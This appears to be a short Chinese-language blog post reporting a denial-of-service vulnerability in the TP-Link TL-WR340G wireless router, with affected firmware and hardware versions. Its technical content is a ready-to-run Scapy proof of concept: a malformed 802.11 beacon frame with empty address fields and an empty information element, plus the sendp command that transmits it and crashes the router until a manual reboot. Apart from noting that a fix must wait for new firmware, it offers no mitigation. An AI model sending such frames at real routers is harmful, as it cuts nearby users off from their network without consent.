A-A+

TL-WR340G无线路由器拒绝服务漏洞和触发过程

2015年11月19日 站长资讯 暂无评论

再安全可靠的软硬件都难免会出现漏洞和BUG,下面以TL-WR340G为例子来说明问题,并提供一些解决的思路。要想修正漏洞,通常都要等待官方发布新的固件。

TL-WR340G是TP-Link出品的一款轻量级无线路由器,近日有国外黑客发现了这款路由器上的一个拒绝服务漏洞,只要发送一个简单的畸形包到路由器,便可使路由器停止工作,需要手动重启路由器才能恢复正常,算是比较严重的了。

漏洞细节:

型号:TL-WR340G无线路由器

固件版本:4.7.11 Build 101102 Rel.60376n

硬件版本:WR340G v3

触发漏洞的过程非常简单,需要用到网络软件Scapy,构造包的详情如下:

1、fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="",addr3="")/Dot11Beacon()/Dot11Elt()

接下来发送数据包:

1、sendp(fr,iface="injection capable wireless interface",count=5)

攻击成功之后,路由器将直接挂掉,具体表现就是不管已经连接还是未连接的客户端都无法连接互联网,除非手动登入管理界面软重启或者断电重启。

标签:

给我留言